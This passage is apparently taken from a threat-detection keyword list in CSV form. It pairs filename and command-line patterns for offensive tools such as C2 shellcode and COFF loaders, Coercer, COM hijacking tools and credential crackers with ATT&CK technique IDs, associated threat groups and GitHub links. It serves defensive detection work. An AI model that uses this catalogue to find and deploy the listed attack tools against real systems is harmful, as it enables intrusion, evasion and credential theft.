- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Axx8/ShellCode_Loader,1,0,N/A,10,10,389,49,2022-09-20T07:24:25Z,2022-09-02T14:41:18Z -*codeload.github.com/*,greyware_tool_keyword,github,Github executables download initiated - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*codeLoader/codeLoader.*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*codewatchorg/bypasswaf*,offensive_tool_keyword,bypasswaf,Add headers to all Burp requests to bypass some WAF products,T1090 - T1189 - T1001,TA0002 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/bypasswaf,1,1,N/A,N/A,4,323,117,2018-01-28T13:13:39Z,2014-11-17T01:29:35Z -*codewatchorg/sqlipy*,offensive_tool_keyword,sqlipy,SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.,T1190 - T1210 - T1574,TA0002 - TA0040 - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/sqlipy,1,1,N/A,N/A,3,247,102,2023-05-08T18:50:41Z,2014-09-22T03:25:42Z -*codewhitesec/apollon*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,1,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*codewhitesec/daphne*,offensive_tool_keyword,daphne,evade auditd by tampering via ptrace,T1054.004 - T1012 - T1057,TA0003 - TA0007,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/daphne,1,1,N/A,8,1,12,2,2023-08-03T08:31:40Z,2023-07-31T11:57:29Z -*Coercer coerce*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer -d * -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of 
offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Coercer fuzz*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*Coercer scan*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.core*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.methods*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.models*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.network*,offensive_tool_keyword,Coercer,A python 
script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*Coercer.py *,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer.structures*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer/core/loader*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*coercer_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*coff_definitions.h*,offensive_tool_keyword,cobaltstrike,Load and execute COFF files and Cobalt Strike BOFs in-memory,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 
- T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/COFFLoader2,1,1,N/A,10,10,156,40,2022-09-13T14:58:30Z,2021-12-14T07:49:17Z -*COFF_Loader.*,offensive_tool_keyword,cobaltstrike,Load and execute COFF files and Cobalt Strike BOFs in-memory,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Yaxser/COFFLoader2,1,1,N/A,10,10,156,40,2022-09-13T14:58:30Z,2021-12-14T07:49:17Z -*COFF_PREP_BEACON*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*CoffeeLdr* go *,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,0,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*CoffeeLdr.x64.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*CoffeeLdr.x86.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*COFFELDR_COFFELDR_H*,offensive_tool_keyword,cobaltstrike,Beacon Object File Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,1,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -*coffexec *.o *,offensive_tool_keyword,bruteratel,A Customized 
Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*COFFLdr.cpp*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*COFFLdr.exe*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*COFFLoader.*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*COFFLoader64.exe*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*CognisysGroup/HadesLdr*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*coinomi2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*coldfusion_dir_traversal_exploit*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Collection/MiniDumpWriteDump.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*com.rastamouse.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - 
TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*com_exec_go(*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,0,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*combine_harvester-main*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,1,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*com-exec.cna*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*COMHunter* -inproc*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COMHunter* -localserver*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COMHunter.csproj*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COMHunter.exe*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - 
TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COMHunter.sln*,offensive_tool_keyword,COMHunter,Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI,T1087.002 - T1012 - T1057,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*COM-Hunter_v*.zip*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*COM-Hunter-main*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,1,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -*-command *.exe* -technique ccmstp*,offensive_tool_keyword,WinPwn,Automation for 